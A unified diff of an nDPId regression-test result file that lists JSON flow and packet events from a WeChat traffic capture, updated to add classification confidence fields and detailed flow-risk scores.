 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1366,"source":"wechat.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795092,"flow_last_seen":1492167795092,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1492167795092,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":49195,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1366,"source":"wechat.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1492167795092,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":88,"pkt_l4_len":34,"ts_msec":1492167795092,"pkt":"MzMAAQAD0CeIF3AEht1gAAAAACIRAf6AAAAAAAAAkfk983Q2bNb\/AgAAAAAAAAAAAAAAAQADwCsU6wAiwAT8cwAAAAEAAAAAAAAIY2Fuc2FxY3EAAAEAAQ=="}
-00618{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1366,"source":"wechat.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795092,"flow_last_seen":1492167795092,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1492167795092,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":49195,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1366,"source":"wechat.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795092,"flow_last_seen":1492167795092,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1492167795092,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":49195,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1367,"source":"wechat.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795095,"flow_last_seen":1492167795095,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1492167795095,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":50577,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1367,"source":"wechat.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1492167795095,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":88,"pkt_l4_len":34,"ts_msec":1492167795095,"pkt":"MzMAAQAD0CeIF3AEht1gAAAAACIRAf6AAAAAAAAAkfk983Q2bNb\/AgAAAAAAAAAAAAAAAQADxZEU6wAifoZEYgAAAAEAAAAAAAAIbWN6dG1wa2MAAAEAAQ=="}
-00618{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1367,"source":"wechat.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795095,"flow_last_seen":1492167795095,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1492167795095,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":50577,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1367,"source":"wechat.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795095,"flow_last_seen":1492167795095,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1492167795095,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":50577,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1368,"source":"wechat.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1492167795096,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1492167795096,"pkt":"AQBeAAD80CeIF3AECABFoAA4Qc0AAAER1D\/AqAFk4AAA\/NNsFOsAJPA+T9YAAAABAAAAAAAACmxiamFtd3B0eHoAAAEAAQ=="}
 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1369,"source":"wechat.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":1492167795098,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":90,"pkt_l4_len":36,"ts_msec":1492167795098,"pkt":"MzMAAQAD0CeIF3AEht1gAAAAACQRAf6AAAAAAAAAkfk983Q2bNb\/AgAAAAAAAAAAAAAAAQADxQgU6wAk8ypP1gAAAAEAAAAAAAAKbGJqYW13cHR4egAAAQAB"}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1370,"source":"wechat.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1492167795099,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"ts_msec":1492167795099,"pkt":"AQBeAAD80CeIF3AECABFoAA2Qc4AAAER1EDAqAFk4AAA\/OA5FOsAIm9WRGIAAAABAAAAAAAACG1jenRtcGtjAAABAAE="}
@@ -425,112 +425,112 @@
 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1373,"source":"wechat.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1492167795103,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":88,"pkt_l4_len":34,"ts_msec":1492167795103,"pkt":"MzMAAQAD0CeIF3AEht1gAAAAACIRAf6AAAAAAAAAkfk983Q2bNb\/AgAAAAAAAAAAAAAAAQADwCsU6wAiwAT8cwAAAAEAAAAAAAAIY2Fuc2FxY3EAAAEAAQ=="}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1374,"source":"wechat.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795292,"flow_last_seen":1492167795292,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1492167795292,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1374,"source":"wechat.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1492167795292,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1492167795292,"pkt":"\/\/\/\/\/\/\/\/0CeIF3AECABFoABOQdAAAIARc3vAqAFkwKgB\/wCJAIkAOgI3\/v8BEAABAAAAAAAAIEVNRUNFS0VCRU5GSEZBRkVGSUZLQ0FDQUNBQ0FDQUFBAAAgAAE="}
-00608{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1374,"source":"wechat.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795292,"flow_last_seen":1492167795292,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1492167795292,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1374,"source":"wechat.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795292,"flow_last_seen":1492167795292,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1492167795292,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1375,"source":"wechat.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":2,"flow_last_seen":1492167795294,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1492167795294,"pkt":"\/\/\/\/\/\/\/\/0CeIF3AECABFoABOQdEAAIARc3rAqAFkwKgB\/wCJAIkAOgw8\/wABEAABAAAAAAAAIEVORURGS0ZFRU5GQUVMRURDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="}
 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1376,"source":"wechat.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":3,"flow_last_seen":1492167795295,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1492167795295,"pkt":"\/\/\/\/\/\/\/\/0CeIF3AECABFoABOQdIAAIARc3nAqAFkwKgB\/wCJAIkAOio7\/wEBEAABAAAAAAAAIEVERUJFT0ZERUJGQkVERkJDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="}
-00594{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1389,"source":"wechat.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167648494,"flow_last_seen":1492167695538,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492167814830,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43851,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00630{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1389,"source":"wechat.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167648494,"flow_last_seen":1492167695538,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492167814830,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43851,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1389,"source":"wechat.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167648494,"flow_last_seen":1492167695538,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492167814830,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43851,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00602{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1389,"source":"wechat.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167640138,"flow_last_seen":1492167695550,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492167814830,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54114,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
+00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1389,"source":"wechat.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167640138,"flow_last_seen":1492167695550,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492167814830,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54114,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1389,"source":"wechat.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167640138,"flow_last_seen":1492167695550,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492167814830,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1395,"source":"wechat.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1492167815567,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":50,"pkt_l4_len":12,"ts_msec":1492167815567,"pkt":"AQBeAAAB8IQvSpdgCABGoAAkj9sAAAEC8bDAqAH+4AAAAZQEAAARZOybAAAAAAIAAAA="}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1398,"source":"wechat.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1492167820408,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"ts_msec":1492167820408,"pkt":"AQBeAAAWeJKcD6iOCABGwAAoAABAAAECQerAqAFn4AAAFpQEAAAiAPsCAAAAAQIAAADgAAD7"}
-00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1401,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167648243,"flow_last_seen":1492167648277,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":495,"flow_tot_l4_payload_len":526,"flow_avg_l4_payload_len":263,"midstream":0,"ts_msec":1492167837279,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":19041,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.QQ","breed":"Fun","category":"Chat"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1401,"source":"wechat.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167650311,"flow_last_seen":1492167650345,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1492167837279,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60562,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1401,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1492167650348,"flow_last_seen":1492167650467,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":3552,"flow_avg_l4_payload_len":355,"midstream":0,"ts_msec":1492167837279,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.67","src_port":35601,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}}
+00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1401,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167648243,"flow_last_seen":1492167648277,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":495,"flow_tot_l4_payload_len":526,"flow_avg_l4_payload_len":263,"midstream":0,"ts_msec":1492167837279,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":19041,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1401,"source":"wechat.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167650311,"flow_last_seen":1492167650345,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1492167837279,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60562,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1401,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1492167650348,"flow_last_seen":1492167650467,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":3552,"flow_avg_l4_payload_len":355,"midstream":0,"ts_msec":1492167837279,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.67","src_port":35601,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}}
 00587{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1401,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1492167641988,"flow_last_seen":1492167781907,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492167837279,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00578{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1401,"source":"wechat.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1492167641988,"flow_last_seen":1492167781907,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492167837279,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492167669545,"flow_last_seen":1492167669545,"flow_idle_time":180000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":0,"ts_msec":1492167847660,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
-00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1492167648277,"flow_last_seen":1492167720406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3430,"flow_tot_l4_payload_len":7446,"flow_avg_l4_payload_len":310,"midstream":0,"ts_msec":1492167847660,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.QQ","breed":"Fun","category":"Chat"}}
-00651{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1492167695237,"flow_last_seen":1492167720429,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":12571,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":1492167847660,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
-00650{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1492167695488,"flow_last_seen":1492167720468,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":196,"midstream":0,"ts_msec":1492167847660,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
+00801{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492167669545,"flow_last_seen":1492167669545,"flow_idle_time":180000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":0,"ts_msec":1492167847660,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
+00789{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1492167648277,"flow_last_seen":1492167720406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3430,"flow_tot_l4_payload_len":7446,"flow_avg_l4_payload_len":310,"midstream":0,"ts_msec":1492167847660,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.QQ","breed":"Fun","category":"Chat"}}
+00677{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1492167695237,"flow_last_seen":1492167720429,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":12571,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":1492167847660,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
+00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1492167695488,"flow_last_seen":1492167720468,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":196,"midstream":0,"ts_msec":1492167847660,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1416,"source":"wechat.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167848542,"flow_last_seen":1492167848542,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1492167848542,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
